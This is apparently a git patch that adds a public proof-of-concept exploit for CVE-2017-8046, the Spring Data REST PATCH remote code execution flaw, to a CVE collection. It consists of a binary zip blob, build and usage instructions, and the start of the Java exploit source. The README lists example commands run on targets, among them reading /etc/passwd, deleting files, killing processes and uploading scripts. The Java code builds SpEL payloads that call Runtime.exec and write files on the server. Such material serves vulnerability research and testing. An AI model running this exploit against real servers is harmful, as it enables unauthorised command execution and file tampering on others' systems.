cve/java-spring/2017/CVE-2017-8046/spring-break_cve-2017-8046-master.zip diff --git a/cve/java-spring/2017/CVE-2017-8046/spring-break_cve-2017-8046-master.zip b/cve/java-spring/2017/CVE-2017-8046/spring-break_cve-2017-8046-master.zip new file mode 100644 index 0000000000000000000000000000000000000000..078e924350cf580703b34d31477354a894198a3b GIT binary patch literal 12833 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 Date: Mon, 10 Apr 2023 10:57:06 +0000 Subject: [PATCH 100/109] add cve-2017-8046 MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit Signed-off-by: 王烁林 <17377137@buaa.edu.cn> --- cve/java-spring/2017/CVE-2017-8046/.gitignore | 60 ++ .../2017/CVE-2017-8046/LICENSE.txt | 13 + cve/java-spring/2017/CVE-2017-8046/README.md | 163 +++++ .../CVE-2017-8046/SpringBreakCve20178046.java | 651 ++++++++++++++++++ cve/java-spring/2017/CVE-2017-8046/pom.xml | 68 ++ 5 files changed, 955 insertions(+) create mode 100644 cve/java-spring/2017/CVE-2017-8046/.gitignore create mode 100644 cve/java-spring/2017/CVE-2017-8046/LICENSE.txt create mode 100644 cve/java-spring/2017/CVE-2017-8046/README.md create mode 100644 cve/java-spring/2017/CVE-2017-8046/SpringBreakCve20178046.java create mode 100644 cve/java-spring/2017/CVE-2017-8046/pom.xml diff --git a/cve/java-spring/2017/CVE-2017-8046/.gitignore b/cve/java-spring/2017/CVE-2017-8046/.gitignore new file mode 100644 index 00000000..6dc7e51e --- /dev/null +++ b/cve/java-spring/2017/CVE-2017-8046/.gitignore @@ -0,0 +1,60 @@ +################### +# Compiled source # +################### +*.com +*.dll +*.exe +*.o +*.so +*.bat + +############ +# Packages # +############ +# it's better to unpack these files and commit the raw source +# git has its own built in compression methods +*.7z +*.dmg +*.gz +*.iso +*.rar +*.tar +*.zip + +###################### +# Logs and databases # +###################### +*.log +*.sqlite + +###################### +# OS generated files # +###################### +.DS_Store* +ehthumbs.db +Icon? +Thumbs.db +*~ + +###################### +# Other repositories # +###################### +.svn +.\#* + +#################### +# Java programming # +#################### +build +doc +generated +target +.project +.classpath +.settings +*.class +*.jar +*.war +*.ear +junit*.properties +/bin/ diff --git a/cve/java-spring/2017/CVE-2017-8046/LICENSE.txt b/cve/java-spring/2017/CVE-2017-8046/LICENSE.txt new file mode 100644 index 00000000..92904254 --- /dev/null +++ b/cve/java-spring/2017/CVE-2017-8046/LICENSE.txt @@ -0,0 +1,13 @@ +Copyright 2018 Antonio Francesco Sardella + +Licensed under the Apache License, Version 2.0 (the "License"); +you may not use this file except in compliance with the License. +You may obtain a copy of the License at + + http://www.apache.org/licenses/LICENSE-2.0 + +Unless required by applicable law or agreed to in writing, software +distributed under the License is distributed on an "AS IS" BASIS, +WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +See the License for the specific language governing permissions and +limitations under the License. \ No newline at end of file diff --git a/cve/java-spring/2017/CVE-2017-8046/README.md b/cve/java-spring/2017/CVE-2017-8046/README.md new file mode 100644 index 00000000..60caa5e0 --- /dev/null +++ b/cve/java-spring/2017/CVE-2017-8046/README.md @@ -0,0 +1,163 @@ +# spring-break_cve-2017-8046 + +This is a Java program that exploits **Spring Break** vulnerability (**CVE-2017-8046**). + +This software is written to have as less external dependencies as possible. + +## DISCLAIMER + +**This tool is intended for security engineers and appsec guys for security assessments. Please use this tool responsibly. I do not take responsibility for the way in which any one uses this application. I am NOT responsible for any damages caused or any crimes committed by using this tool.** + +## Vulnerability info + +* **CVE-ID**: CVE-2017-8046 +* **Link**: [https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8046](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8046) +* **Description**: Malicious *PATCH* requests submitted to *spring-data-rest* servers in **Pivotal Spring Data REST** versions prior to **2.5.12**, **2.6.7**, **3.0 RC3**, **Spring Boot** versions prior to **2.0.0M4**, and **Spring Data** release trains prior to **Kay-RC3** can use specially crafted JSON data to run arbitrary Java code. +* **Vendor link**: [https://pivotal.io/security/cve-2017-8046](https://pivotal.io/security/cve-2017-8046) + +## How to generate an executable JAR + +Here some steps to follow in order to generate an executable JAR, with all dependencies into it, that can be used to launch the exploit. + +### with Maven + +Following Maven command can be launched: + +``` +mvn clean compile package +``` + +### with Eclipse + +Following steps can be done: +1. solve all external dependencies/libraries; +1. right click on the Eclipse project and go to `Run As > Run Configurations`; +1. right click on `Java Application` then on `New`; +1. choose a name and set the main class to `com.afs.exploit.spring.SpringBreakCve20178046`; +1. click on `Apply` button; +1. close the window and go back to the main Eclipse window; +1. right click on the Eclipse project and click on `Export...`; +1. find and choose `Runnable JAR file` (under `Java` branch); +1. in the following window: + 1. choose the correct `Launch configuration` created before; + 1. choose an `Export destination`; + 1. choose the option `Extract required libraries into generated JAR`; + 1. click on `Finish` button. + +## Help + +``` +Usage: + java -jar spring-break_cve-2017-8046.jar [options] +Description: + Exploiting 'Spring Break' Remote Code Execution (CVE-2017-8046). +Options: + -h, --help + Prints this help and exits. + -u, --url [target_URL] + The target URL where the exploit will be performed. + You have to choose an existent resource. + -cmd, --command [command_to_execute] + The command that will be executed on the remote machine. + -U, --upload [file_to_upload] + File to upload to the remote machine. Will be uploaded to the current working + directory of the java process. Warning: this will only succeed on a server running + JRE-1.7 or later. + --remote-upload-directory [/some/existing/path/] + Optional. Server will attempt to write the uploaded file to this directory on the + filesystem. Specified directory must exist and be writeable. + --cookies [cookies] + Optional. Cookies passed into the request, e.g. authentication cookies. + -H, --header [custom_header] + Optional. Custom header passed into the request, e.g. authorization header. + -k + Skip SSL validation + --clean + Optional. Removes error messages in output due to the usage of the + exploit. It could hide error messages if the request fails for other reasons. + --error-stream + Optional. In case of errors the command will fail and the error stream will + not be returned. This option can be used to relaunch the remote command + returning the error stream. + -v, --verbose + Optional. Increase verbosity. +``` + + +## Examples + +``` +java -jar spring-break_cve-2017-8046.jar --url "https://vuln01.foo.com/api/v1/entity/123" --command ipconfig +``` + +``` +java -jar spring-break_cve-2017-8046.jar --url "https://vuln02.foo.com/api/v2/entity/42" --command ipconfig --cookies "JSESSIONID=qwerty0123456789" +``` + +``` +java -jar spring-break_cve-2017-8046.jar -v --url "https://vuln02.foo.com/api/v2/entity/42" --upload file.sh --remote-upload-directory /tmp +``` + +``` +java -jar spring-break_cve-2017-8046.jar --url "https://vuln03.foo.com/asd/api/v1/entity/1" --command dir --cookies "JSESSIONID=qwerty0123456789;foo=bar" +``` + +``` +java -jar spring-break_cve-2017-8046.jar --url "https://vuln04.foo.com/asd/api/v1/entity/1" --command "dir C:\Windows" --clean +``` + +``` +java -jar spring-break_cve-2017-8046.jar --url "https://vuln05.foo.com/asd/api/v1/entity/1" --command "copy /b NUL ..\..\pwned.txt" --clean +``` + +``` +java -jar spring-break_cve-2017-8046.jar --url "https://vuln06.foo.com/asd/api/v1/entity/1" --command "ping -c 3 www.google.it" --clean +``` + +``` +java -jar spring-break_cve-2017-8046.jar --url "https://vuln07.foo.com/asd/api/v1/entity/1" --command "ps aux" --clean +``` + +``` +java -jar spring-break_cve-2017-8046.jar --url "https://vuln08.foo.com/asd/api/v1/entity/1" --command "uname -a" --clean +``` + +``` +java -jar spring-break_cve-2017-8046.jar --url "https://vuln09.foo.com/asd/api/v1/entity/1" --command "ls -l" --clean +``` + +``` +java -jar spring-break_cve-2017-8046.jar --url "https://vuln10.foo.com/asd/api/v1/entity/1" --command "wget https://www.google.com" --clean +``` + +``` +java -jar spring-break_cve-2017-8046.jar --url "https://vuln11.foo.com/asd/api/v1/entity/1" --command "rm index.html" --clean +``` + +``` +java -jar spring-break_cve-2017-8046.jar --url "https://vuln12.foo.com/asd/api/v1/entity/1" --command "cat /etc/passwd" --clean +``` + +``` +java -jar spring-break_cve-2017-8046.jar --url "https://vuln13.foo.com/asd/api/v1/entity/1" --command "kill -9 5638" --clean +``` + +Please note that the referenced resource/URL must exist! + +## Vulnerable application + +A vulnerable application can be found [here](https://github.com/m3ssap0/SpringBreakVulnerableApp). + +## Authors + +* **Antonio Francesco Sardella** - *main implementation* - [m3ssap0](https://github.com/m3ssap0) +* **Yassine Tioual** - *HTTP header enhancement* - [nisay759](https://github.com/nisay759) +* **Robin Wagenaar** - *for the suggestion to use patch operation 'remove' instead of 'replace' and for the file upload functionality* - [RobinWagenaar](https://github.com/RobinWagenaar) + +## License + +This project is licensed under the Apache License Version 2.0 - see the **LICENSE.txt** file for details. + +## Acknowledgments + +* [Man Yue Mo](https://lgtm.com/blog/spring_data_rest_CVE-2017-8046_ql) the security researcher who discovered the vulnerability \ No newline at end of file diff --git a/cve/java-spring/2017/CVE-2017-8046/SpringBreakCve20178046.java b/cve/java-spring/2017/CVE-2017-8046/SpringBreakCve20178046.java new file mode 100644 index 00000000..7488b58c --- /dev/null +++ b/cve/java-spring/2017/CVE-2017-8046/SpringBreakCve20178046.java @@ -0,0 +1,651 @@ +// Exploit Title: RCE in PATCH requests in Spring Data REST +// Date: 2018-03-10 +// Exploit Author: Antonio Francesco Sardella +// Vendor Homepage: https://pivotal.io/ +// Software Link: https://projects.spring.io/spring-data-rest/ +// Version: Spring Data REST versions prior to 2.6.9 (Ingalls SR9), 3.0.1 (Kay SR1) +// Tested on: 'Microsoft Windows 7' and 'Xubuntu 17.10.1' with 'spring-boot-starter-data-rest' version '1.5.6.RELEASE' +// CVE: CVE-2017-8046 +// Category: Webapps +// Repository: https://github.com/m3ssap0/spring-break_cve-2017-8046 +// Example Vulnerable Application: https://github.com/m3ssap0/SpringBreakVulnerableApp +// Vulnerability discovered and reported by: Man Yue Mo from Semmle and lgtm.com + +package com.afs.exploit.spring; + +import java.io.BufferedReader; +import java.io.File; +import java.io.IOException; +import java.io.InputStreamReader; +import java.net.URI; +import java.net.URISyntaxException; +import java.util.ArrayList; +import java.util.List; + +import org.apache.commons.codec.binary.Base64; +import org.apache.commons.io.FileUtils; +import org.apache.http.HttpResponse; +import org.apache.http.client.HttpClient; +import org.apache.http.client.methods.HttpPatch; +import org.apache.http.entity.StringEntity; +import org.apache.http.impl.client.HttpClientBuilder; +import org.apache.http.ssl.SSLContextBuilder; +import org.apache.http.conn.ssl.TrustSelfSignedStrategy; +import org.apache.http.conn.ssl.SSLConnectionSocketFactory; +import org.apache.http.conn.ssl.NoopHostnameVerifier; + +/** + * This is a Java program that exploits Spring Break vulnerability (CVE-2017-8046). + * This software is written to have as less external dependencies as possible. + * DISCLAIMER: This tool is intended for security engineers and appsec guys for security assessments. Please + * use this tool responsibly. I do not take responsibility for the way in which any one uses this application. + * I am NOT responsible for any damages caused or any crimes committed by using this tool. + * .................. + * . CVE-ID ........: CVE-2017-8046 + * . Link ..........: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8046 + * . Description ...: Malicious PATCH requests submitted to spring-data-rest servers in Pivotal Spring Data REST + * .................. versions prior to 2.5.12, 2.6.9, 3.0 RC3, Spring Boot versions prior to 2.0.0M4, and Spring + * .................. Data release trains prior to Kay-RC3 can use specially crafted JSON data to run arbitrary + * .................. Java code. + * .................. + * + * @author Antonio Francesco Sardella + */ +public class SpringBreakCve20178046 { + + /** + * Version string. + */ + private static final String VERSION = "v1.6 (2018-10-13)"; + + /** + * The JSON Patch object. + */ + private static String JSON_PATCH_OBJECT = "[{ \"op\" : \"remove\", \"path\" : \"%s\", \"value\" : \"pwned\" }]"; + + /** + * This is a way to bypass the split and 'replace' + * logic performed by the framework on slashes. + */ + private static String SLASH = "(new java.lang.String(new char[]{0x2F}))"; + + /** + * Malicious SpEL-script for executing commands. + */ + private static String COMMAND_PAYLOAD; + static { + COMMAND_PAYLOAD = "T(org.springframework.util.StreamUtils).copy("; + COMMAND_PAYLOAD += "T(java.lang.Runtime).getRuntime().exec("; + COMMAND_PAYLOAD += "("; + COMMAND_PAYLOAD += "T(java.lang.System).getProperty(\\\"os.name\\\").toLowerCase().contains(\\\"win\\\")"; + COMMAND_PAYLOAD += "?"; + COMMAND_PAYLOAD += "\\\"cmd \\\"+" + SLASH + "+\\\"c \\\""; + COMMAND_PAYLOAD += ":"; + COMMAND_PAYLOAD += "\\\"\\\""; + COMMAND_PAYLOAD += ")+"; + COMMAND_PAYLOAD += "%s"; // The encoded command will be placed here. + COMMAND_PAYLOAD += ").get%sStream()"; + COMMAND_PAYLOAD += ","; + COMMAND_PAYLOAD += "T(org.springframework.web.context.request.RequestContextHolder).currentRequestAttributes()"; + COMMAND_PAYLOAD += ".getResponse().getOutputStream()"; + COMMAND_PAYLOAD += ").x"; + } + + /** + * Malicious SpEL-script for uploading files (like scripts, binaries, etc). + */ + private static String FILEUPLOAD_PAYLOAD; + static { + // Classes java.nio.file.* are only available in Java 7+. + FILEUPLOAD_PAYLOAD = "T(java.nio.file.Files).write("; + FILEUPLOAD_PAYLOAD += "T(java.nio.file.Paths).get(%s),"; + FILEUPLOAD_PAYLOAD += "T(java.util.Base64).getDecoder().decode(\\\"%s\\\")"; + FILEUPLOAD_PAYLOAD += ").x"; + } + + /** + * Error cause string that can be used to "clean the response." + */ + private static String ERROR_CAUSE = "{\"cause"; + + /** + * Constant that will be used to get input stream. + */ + private static String INPUT_STREAM = "Input"; + + /** + * Constant that will be used to get error stream. + */ + private static String ERROR_STREAM = "Error"; + + /** + * The target URL. + */ + private URI url; + + /** + * Whether to skipSSL or not, default set to false + */ + private boolean skipSSL; + + /** + * The command that will be executed on the remote machine. + */ + private String command; + + /** + * Cookies that will be passed. + */ + private String cookies; + + /** + * Flag used to remove error messages in output due to + * the usage of the exploit. It could hide error messages + * if the request fails for other reasons. + */ + private boolean cleanResponse; + + /** + * This flag can be used to retrieve the error stream + * in case the launched remote command fails unexpectedly. + */ + private boolean errorStream; + + /** + * Verbosity flag. + */ + private boolean verbose; + + /** + * Custom headers that will be passed. + */ + private List customHeaders = new ArrayList(); + + /** + * Path that will point to a file on the local filesystem, which will + * be uploaded. Uploads cannot be used in conjunction with commands in the + * same request. + */ + private File 